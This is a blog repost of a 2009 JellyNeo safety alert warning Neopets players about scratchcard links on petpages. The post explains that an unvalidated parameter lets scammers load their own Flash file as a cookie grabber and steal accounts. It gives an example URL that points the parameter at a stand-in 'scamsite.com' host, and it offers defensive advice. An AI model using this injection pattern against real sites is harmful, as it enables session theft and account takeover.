***SCAM ALERT*** Per JellyNeo.

This is taken from Jellyneo.net.

jnSafety Team Alert: Potential Scratchcard Cookie Grabber!
  • Posted by Dave
  • Posted on January 8, 2009, 8:42 pm NST

We have a brand new scam that is taking the Neoboards by storm! This one, I have to say, is pretty brilliant with respects to what is being exploited…


Basically, some scammers are changing their petpages to show a picture of the Pant Devil with a message saying something along the lines of “The Pant Devil has stolen this page! Click here to reclaim it!” The link goes to a Desert Scratchcard, waiting to be scratched by you. The only thing is, the scammers have potentially included some malicious coding in that URL, rendering them able to steal your Neopets account password and gain access to your account.

In short, DO NOT click on any links on petpages, shops, userlookups, guilds, or Neoboards that lead to a scratchcard. One, you should not be viewing them in that fashion, and two, your account may be stolen! Also be warned that not all links will necessarily include the Pant Devil set up mentioned above. Just be wary of clicking any “long links” for now. 😉

If You Clicked: If you clicked a scratchcard link, change your password immediately. You must change it right now. Also, apply a PIN Number to all areas where you have significant NP invested. Even if you didn’t click the link, this is a great precaution. You can only be affected by this scam if you click the scratchcard link… so don’t!

For the techies out there, The Neopets Team has failed to secure one of the GET variables that the flash scratchcards are using. So, the scammers are able to include their own malicious flash file as a “background image” in the scratchcard that doubles as a cookie grabber. Example:

images.neopets.com/flashfile.swf?background=http://scamsite.com/badcode.swf
Sheer genius, really. Neopets basically has to update their scratchcard coding to include some sort of validation to make sure any flash files being included are strictly from the images.neopets.com or swf.neopets.com servers. Hopefully this does not call for an extended downtime of scratchcards like last time!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: